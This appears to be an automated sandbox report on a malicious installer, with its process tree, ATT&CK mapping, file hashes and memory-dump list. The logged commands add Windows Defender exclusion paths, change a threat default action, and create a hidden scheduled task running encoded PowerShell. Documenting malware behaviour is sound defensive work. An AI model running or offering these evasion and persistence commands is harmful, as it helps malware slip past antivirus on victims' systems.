"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4940

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:64

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3404

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:32
3⤵
PID:3492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:64
3⤵
PID:3412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:32
3⤵
PID:212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:64
3⤵
PID:1460

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKtLtCpKi" /SC once /ST 01:27:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4056

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKtLtCpKi"
2⤵
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3192

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4880

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1936

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
12KB

MD5
be52203d2c03297daed41b4f61f846c0

SHA1
778748c3b9d14d066a45eae5dcb9e4595fc242fb

SHA256
a830b3976a45883c6e81fbc36bc15c82a5b7f19f612516648e2ab066faed4227

SHA512
2a98c8dbe7930d727731085588f805218634dc8ade3c2aee17070c04f89860cdfdcb6919e4badd350948ef0829a3a10c6afdafc73fdd16228791b0ad550f8595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS5C58.tmp\Install.exe
Filesize
6.6MB

MD5
f8efb05b940b05fc74801b61b3c0f500

SHA1
8e3eb6d604f3552d48ebcb385fc2681716b172af

SHA256
90c6b16de088ab3f5737bcb599bb9ffd69a28abd149ab986b7fe52ba8bb2f400

SHA512
028ea55f06fbfb079673df19e6e6249e3a2107a3d5485586f8c18724bf0a6a996ea5a7e31721bed9f7bf677bbf789c596994601076c66676c92fbd3a94741fff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_biz1uuq5.d1f.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
12KB

MD5
90056e41afd05fae6f1cc1bad85ff5d0

SHA1
ace5ad08a1b3bec2824c770c5242ee678ae7be2d

SHA256
f40ed23387c12897ed541556ebbc601fcaaa472aac6cdeba41f9bdc3cc091c28

SHA512
35c8bed943c351bf3e5c009fae4ffe8af825c15a8dfaa5c73705e88f70e9df31fdd5fedc3e9794f94e45c35067b4b93b0c55a0061160bf4b8443dbadac15e8a4

Download Submit
memory/1840-72-0x0000000072250000-0x000000007293E000-memory.dmp

Filesize
6.9MB

Download
memory/1840-71-0x00000000039D0000-0x00000000039E0000-memory.dmp

Filesize
64KB

Download
memory/1840-57-0x00000000070F0000-0x000000000713B000-memory.dmp

Filesize
300KB

Download
memory/1840-56-0x0000000006C40000-0x0000000006F90000-memory.dmp

Filesize
3.3MB

Download
memory/1840-53-0x0000000072250000-0x000000007293E000-memory.dmp

Filesize
6.9MB

Download
memory/1840-54-0x00000000039D0000-0x00000000039E0000-memory.dmp

Filesize
64KB

Download
memory/1840-55-0x00000000039D0000-0x00000000039E0000-memory.dmp

Filesize
64KB

Download
memory/2904-92-0x0000000006040000-0x0000000006050000-memory.dmp

Filesize
64KB

Download
memory/2904-76-0x0000000072250000-0x000000007293E000-memory.dmp

Filesize
6.9MB

Download
memory/2904-77-0x0000000006040000-0x0000000006050000-memory.dmp

Filesize
64KB

Download
memory/2904-78-0x0000000006040000-0x0000000006050000-memory.dmp

Filesize
64KB

Download
memory/2904-93-0x0000000072250000-0x000000007293E000-memory.dmp

Filesize
6.9MB

Download
memory/3148-12-0x0000000010000000-0x00000000105D7000-memory.dmp

Filesize
5.8MB

Download
memory/3192-103-0x00000225D4AA0000-0x00000225D4AB0000-memory.dmp

Filesize
64KB

Download
memory/3192-102-0x00000225D4AA0000-0x00000225D4AB0000-memory.dmp

Filesize
64KB

Download
memory/3192-101-0x00007FF8FD800000-0x00007FF8FE1EC000-memory.dmp

Filesize
9.9MB

Download
memory/3192-100-0x00000225D4A50000-0x00000225D4A72000-memory.dmp

Filesize
136KB

Download
memory/3192-107-0x00000225D4C30000-0x00000225D4CA6000-memory.dmp

Filesize
472KB

Download
memory/3192-129-0x00000225D4AA0000-0x00000225D4AB0000-memory.dmp

Filesize
64KB

Download
memory/3192-130-0x00007FF8FD800000-0x00007FF8FE1EC000-memory.dmp

Filesize
9.9MB

Download
memory/3628-48-0x0000000010000000-0x00000000105D7000-memory.dmp

Filesize
5.8MB

Download
memory/3676-25-0x0000000007EF0000-0x0000000008240000-memory.dmp

Filesize
3.3MB

Download
memory/3676-23-0x0000000007DF0000-0x0000000007E56000-memory.dmp

Filesize
408KB

Download
memory/3676-20-0x0000000006EC0000-0x0000000006ED0000-memory.dmp

Filesize
64KB

Download
memory/3676-17-0x0000000006E70000-0x0000000006EA6000-memory.dmp

Filesize
216KB

Download
memory/3676-18-0x0000000072170000-0x000000007285E000-memory.dmp

Filesize
6.9MB

Download
memory/3676-21-0x0000000007500000-0x0000000007B28000-memory.dmp

Filesize
6.2MB

Download
memory/3676-22-0x0000000007B70000-0x0000000007B92000-memory.dmp

Filesize
136KB

Download
memory/3676-19-0x0000000006EC0000-0x0000000006ED0000-memory.dmp

Filesize
64KB

Download
memory/3676-24-0x0000000007D80000-0x0000000007DE6000-memory.dmp

Filesize
408KB

Download
memory/3676-28-0x0000000008610000-0x0000000008686000-memory.dmp

Filesize
472KB

Download
memory/3676-26-0x0000000007E80000-0x0000000007E9C000-memory.dmp

Filesize
112KB

Download
memory/3676-43-0x0000000072170000-0x000000007285E000-memory.dmp

Filesize
6.9MB

Download
memory/3676-39-0x0000000006EC0000-0x0000000006ED0000-memory.dmp

Filesize
64KB

Download
memory/3676-27-0x0000000008360000-0x00000000083AB000-memory.dmp

Filesize
300KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads